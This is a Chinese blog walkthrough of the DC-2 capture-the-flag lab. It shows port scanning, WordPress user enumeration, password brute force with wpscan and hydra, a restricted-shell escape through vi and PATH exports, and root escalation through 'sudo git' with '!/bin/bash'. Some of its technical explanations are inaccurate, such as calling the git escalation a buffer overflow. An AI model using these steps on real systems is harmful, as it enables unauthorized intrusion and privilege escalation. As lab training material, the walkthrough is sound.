长亭百川云 - 文章详情

渗透测试实战-靶机入侵

LULU

67

2024-06-19

虚拟机配置要求攻击机kali 和靶机在同一网段下,我这里都是用的NAT模式,访问靶机IP时,发现是通过域名进行访问的,但是,会出现无法访问。这个时候需要配置/etc/hosts,将IP地址和域名进行绑定  如:192.168.111.135 dc-2

1、信息收集

ip

namp -sP 192.168.111.0/24

端口

nmap -A -p- 192.168.111.135

80端口为:http服务, 版本为:Apache httpd 2.4.10 ((Debian)) ,CMS :WordPress

7744端口为:ssh服务,版本号为:OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

访问web站点,发现将IP地址跳转到域名

修改/etc/hosts文件,将IP地址和域名进行绑定

再次访问

2、flag1

查看flag1

依据提示,使用cewl生成字典,进行暴力破解,获取账户名和密码

使用目录扫描工具,找到登录页面

dirb http://192.168.111.135

cewl是kali上自带的一款字典生成工具

cewl http://dc-2/ -w > dict.txt

根据信息收集,是一个wordpress的站版本为版本4.7.10,利用wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。wpscan -h 查看用法。

wpscan --url http://dc-2 --enumerate u 枚举用户

枚举用户

生成用户名字典

破解密码

wpscan --url http://dc-2 -U user.txt -P dict.txt

Username: jerry, Password: adipiscing  
Username: tom, Password: parturient

登录jerry

3、flag2

登录tom 也没发现任何的问题。依据之前做的信息收集,发现ssh服务是开放的,端口为7744  尝试利用

使用hydra爆破出了的tom的ssh服务密码,该工具在kali中是自带的

hydra -L user.txt -P dict.txt ssh://192.168.111.136 -s 7744 -t 64

得到密码,登录SSH

ssh tom@192.168.111.135 -p 7744

4、flag3

但是无法使用cat 命令进行查看 ,shell 权限被限制了

查看可以使用的命令,echo $PATH

less flag3.txt

5、flag4

解决rbash绕过问题

rbash是受限的shell的一种,设置受限的shell,防止攻击者的入侵,提高一些会对系统造成危害的命令

方法一vi提权:通过vi 编辑器,进行饶过

vi flag3.txt       :set shell=/bin/sh  回车  
运行shell:          shell               回车

vi编辑flag3.txt ,可以使用cd 等命令

方法二通过export命令修改环境变量得到shell

BASH_CMDS[a]=/bin/sh;a      注:把/bin/bash给a变量`  
export PATH=$PATH:/bin/     注:将/bin 作为PATH环境变量导出  
export PATH=$PATH:/usr/bin  注:将/usr/bin作为PATH环境变量导出  
echo /*                      输出根目录

先查看用户信息

cat /etc/passwd

切换Jerry用户下

su jerry  切换身份  
cd /home/jerry 进入Jerry目录

6、flag5

查看一下可以使用的root权限命令

find / -perm -u=s -type f 2>/dev/null  
‐perm 按照文件权限来查找文件  
‐u=s 基于用户可写查找  //s就是root用户的意思  
‐type f 查找普通类型文件

sudo 可以使用,尝试提权

(root) NOPASSWD: /usr/bin/git表示root用户可以在不需要输入密码的情况下使用/usr/bin/git
命令

根据提示最后的flag使用git,通过git来提权

git提权的原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码既可以执行这条命令

方法1:sudo git help config,然后在末行输入!/bin/bash或!'sh'完成提权。  
  
方法2:sudo git -p help,然后输入!/bin/bash,即可打开一个root的shell

成功提权,访问flag5.txt

加下方wx,拉你一起进群学习

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2